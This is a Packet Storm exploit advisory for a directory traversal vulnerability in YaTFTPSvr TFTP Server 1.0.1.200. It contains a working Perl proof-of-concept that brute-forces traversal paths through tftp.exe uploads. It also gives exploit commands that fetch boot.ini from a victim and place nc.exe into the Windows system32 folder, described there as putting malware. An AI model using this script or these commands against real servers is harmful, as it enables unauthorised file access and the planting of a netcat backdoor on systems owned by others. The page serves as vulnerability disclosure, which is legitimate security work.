what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

YaTFTPSvr TFTP Server 1.0.1.200 Directory Traversal

YaTFTPSvr TFTP Server 1.0.1.200 Directory Traversal
Posted Oct 31, 2011
Authored by demonalex

YaTFTPSvr TFTP Server version 1.0.1.200 suffers from a directory traversal vulnerability.

tags | exploit, file inclusion
SHA-256 | 6ddae08782aa12aa53c8dc1fa2128d442f632d92205bcb8374fc0a8d4c93ff27

YaTFTPSvr TFTP Server 1.0.1.200 Directory Traversal

Change Mirror Download
Title: YaTFTPSvr TFTP Server Directory Traversal Vulnerability
Software : YaTFTPSvr TFTP Server
Software Version : 1.0.1.200
Vendor: http://sites.google.com/site/zhaojieding2/
Vulnerability Published : 2011-07-11
Vulnerability Update Time :
Status :
Impact : Medium
Bug Description :
YaTFTPSvr TFTP Server does not properly sanitise filenames containing directory traversal sequences that are received from an TFTP client.
Proof Of Concept :
After installing YaTFTPSvr in C drive, and set some pretreatment:
****************************************************************
#!/usr/bin/perl -w
$|=1;
$target_ip=shift || die "usage: $0 \$target_ip\n";
@directory_traversal=(
'..\tmp.txt',
'..\..\tmp.txt',
'..\..\..\tmp.txt',
'..\..\..\..\tmp.txt',
'..\..\..\..\..\tmp.txt',
'..\..\..\..\..\..\tmp.txt',
'..\..\..\..\..\..\..\tmp.txt'
);
open(TMP, ">tmp.txt");
print TMP "tmp";
close(TMP);
foreach $dt_content (@directory_traversal){
$dt_it=`tftp.exe $target_ip put tmp.txt $dt_content`;
print "command : tftp.exe $target_ip put tmp.txt $dt_content\n";
print "$dt_it";
if($dt_it=~m/^Transferred successfully/){
print "Directory Traversal PAYLOAD is $dt_content.\n";
print "Press [ENTER] Button to continue...\n";
<STDIN>;
}
sleep(3);
}
print "Finish!\n";
exit(0);
****************************************************************
Exploit :
****************************************************************
#get sensitive file
c:\windows\system32>tftp [VICTIM_IP] get ../../boot.ini boot.ini
#put malware
c:\windows\system32>tftp [VICTIM_IP] put nc.exe ../../WINDOWS/system32/nc.exe
****************************************************************
Credits : This vulnerability was discovered by demonalex(at)163(dot)com
Pentester/Researcher
Dark2S Security Team/PolyU.HK
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close